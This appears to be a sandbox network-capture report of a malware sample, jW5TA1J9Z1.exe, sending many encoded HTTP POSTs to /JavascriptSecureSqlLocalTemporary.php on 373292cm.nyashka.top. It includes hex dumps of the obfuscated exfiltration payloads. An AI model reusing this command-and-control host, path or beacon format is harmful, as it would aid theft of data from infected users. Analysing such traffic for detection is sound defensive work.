                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.2.7 | 65385 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:34.864108086 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:35.211775064 CEST | 2544 | OUT | Data Raw: 5f 5d 5c 56 51 42 54 5d 5b 5f 5a 51 59 5f 58 5f 57 59 5d 5c 57 59 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\VQBT][_ZQY_X_WY]\WYSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.].#5['# )>((9\<='[ ,R7'(;\# 68&F$.Y/
                                                                    Aug 21, 2024 10:03:35.547939062 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:35.747035980 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.2.7 | 65386 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:36.471767902 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:36.818242073 CEST | 2544 | OUT | Data Raw: 5a 56 59 54 54 43 54 5e 5b 5f 5a 51 59 5f 58 5e 57 51 5d 5d 57 59 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYTTCT^[_ZQY_X^WQ]]WYS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,8!=##=)>0X(>5)-+X 0!!,S<4#01/>&F$.Y/
                                                                    Aug 21, 2024 10:03:37.130477905 CEST | 1236 | OUT | Data Raw: 5a 56 59 54 54 43 54 5e 5b 5f 5a 51 59 5f 58 5e 57 51 5d 5d 57 59 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYTTCT^[_ZQY_X^WQ]]WYS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,8!=##=)>0X(>5)-+X 0!!,S<4#01/>&F$.Y/
                                                                    Aug 21, 2024 10:03:37.645534992 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:37.645909071 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:37.646688938 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:37.650804043 CEST | 1308 | OUT | Data Raw: 3b 59 2c 11 37 0f 2f 20 00 3a 3b 14 39 09 08 06 2c 5d 5a 42 3f 5e 01 26 29 00 02 1c 31 0a 0c 3b 0b 0a 2c 35 3f 00 30 04 34 0f 05 1b 08 56 03 35 2a 24 2d 3f 3e 02 58 12 0b 56 1b 3f 2b 3c 5b 0b 32 13 26 5f 33 5e 59 1f 09 3f 50 14 3a 37 0c 22 34 3d
                                                                    Data Ascii: ;Y,7/ :;9,]ZB?^&)1;,5?04V5*$-?>XV?+<[2&_3^Y?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=1
                                                                    Aug 21, 2024 10:03:38.052490950 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.2.7 | 65387 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:38.251748085 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:38.602871895 CEST | 2544 | OUT | Data Raw: 5f 56 5c 51 54 42 54 5b 5b 5f 5a 51 59 50 58 57 57 5c 5d 53 57 5e 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _V\QTBT[[_ZQYPXWW\]SW^SZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.^. 0#.<Y %*=??X:+=;X 4"/<_< V!Y,&F$.Y/
                                                                    Aug 21, 2024 10:03:38.925242901 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:39.369179010 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:03:39.369411945 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    30 | 192.168.2.7 | 65388 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:39.528065920 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:39.880758047 CEST | 1844 | OUT | Data Raw: 5f 54 5c 55 54 45 54 5f 5b 5f 5a 51 59 52 58 52 57 5e 5d 5f 57 5b 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\UTET_[_ZQYRXRW^]_W[S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.8$" X 6='+)<>#Y <#7,<Y4>;&F$.Y/1
                                                                    Aug 21, 2024 10:03:40.210724115 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:40.408946991 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 11 3d 36 21 05 32 3b 30 54 24 55 32 1d 29 3d 3f 1d 2b 2e 2d 14 25 28 0f 17 32 3d 3c 13 30 15 32 02 2b 2e 22 57 32 3c 24 01 39 34 2b 5d 0c 13 22 1b 34 3a 32 5c 31 3c 01 05 2a 38 2c 05 22 12 03 02 2b 14 36 0d 3c 3f 3c 5f 28 17 37 10 28 04 21 0a 3b 01 3d 15 2d 09 2e 54 23 04 2b 52 0d 11 27 0d 28 2e 21 10 29 3e 19 5d 22 01 27 59 33 2e 32 13 32 54 32 57 33 39 3f 03 25 21 39 1d 30 0f 22 0f 24 38 31 03 26 06 22 0c 35 08 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &=6!2;0T$U2)=?+.-%(2=<02+."W2<$94+]"4:2\1<*8,"+6<?<_(7(!;=-.T#+R'(.!)>]"'Y3.22T2W39?%!90"$81&"5#T,"W3UV


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    31 | 192.168.2.7 | 65389 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:39.531660080 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:39.880654097 CEST | 2544 | OUT | Data Raw: 5f 53 5c 5f 54 40 51 59 5b 5f 5a 51 59 52 58 5f 57 50 5d 5e 57 58 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _S\_T@QY[_ZQYRX_WP]^WXSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/35;40\=+="+.$#Z#V7V*)(7#";.&F$.Y/1
                                                                    Aug 21, 2024 10:03:40.213488102 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:40.412091970 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    32 | 192.168.2.7 | 65390 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:40.602412939 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:40.958832979 CEST | 2544 | OUT | Data Raw: 5f 54 5c 56 51 42 54 5b 5b 5f 5a 51 59 51 58 5e 57 5c 5d 5c 57 59 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\VQBT[[_ZQYQX^W\]\WYSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;0'!+73!)4\?>[<> 44+44=Y8&F$.Y/=
                                                                    Aug 21, 2024 10:03:41.276444912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:41.405703068 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    33 | 192.168.2.7 | 65391 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:41.581338882 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:41.927561045 CEST | 2544 | OUT | Data Raw: 5f 5d 5c 5f 54 42 51 5d 5b 5f 5a 51 59 52 58 5f 57 51 5d 52 57 5c 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\_TBQ][_ZQYRX_WQ]RW\S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.830".?# 1\==7+..?/Y743?)X7*,>&F$.Y/1
                                                                    Aug 21, 2024 10:03:41.959953070 CEST | 1236 | OUT | Data Raw: 09 3f 50 14 3a 37 0c 22 34 3d 31 27 38 3c 06 5a 02 31 2b 13 38 06 31 3b 0c 39 1b 1b 3c 04 06 5c 30 01 2f 16 3a 05 17 3a 34 5f 3e 57 26 3f 27 21 12 2a 20 20 30 00 25 0f 2c 06 3e 1f 34 56 0f 2e 08 28 53 15 32 5b 09 2d 35 2e 0c 09 33 3c 20 2f 09 39
                                                                    Data Ascii: ?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=17>$<683?9?]V;:1Y5,'(2&2081X??<!,!Z2* %
                                                                    Aug 21, 2024 10:03:42.264672995 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    34 | 192.168.2.7 | 65392 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:42.347735882 CEST | 331 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 156172
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:43.051865101 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:43.795121908 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    35 | 192.168.2.7 | 65393 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:42.479541063 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:42.833745956 CEST | 2544 | OUT | request body data
                                                                    Aug 21, 2024 10:03:43.157983065 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:43.362962008 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    36 | 192.168.2.7 | 65394 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:43.535428047 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:43.920815945 CEST | 2544 | OUT | request body data
                                                                    Aug 21, 2024 10:03:44.212580919 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:44.345588923 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    37 | 192.168.2.7 | 65395 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:44.653165102 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:45.006156921 CEST | 2544 | OUT | request body data
                                                                    Aug 21, 2024 10:03:45.347588062 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    38 | 192.168.2.7 | 65396 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:45.418178082 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:45.771471977 CEST | 1844 | OUT | request body data
                                                                    Aug 21, 2024 10:03:46.100972891 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:46.234527111 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    39 | 192.168.2.7 | 52995 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:45.545778990 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:45.896255016 CEST | 2544 | OUT | request body data
                                                                    Aug 21, 2024 10:03:46.227910995 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:46.359456062 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    40 | 192.168.2.7 | 52996 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:46.690933943 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:47.036875963 CEST | 2544 | OUT | request body data
                                                                    Aug 21, 2024 10:03:47.364295959 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:47.499989986 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    41 | 192.168.2.7 | 52997 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:47.633029938 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:47.990055084 CEST | 2544 | OUT | request body data
                                                                    Aug 21, 2024 10:03:48.306845903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:48.437634945 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    42 | 192.168.2.7 | 52998 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:48.571717024 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2532
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:48.934050083 CEST | 2532 | OUT | request body data
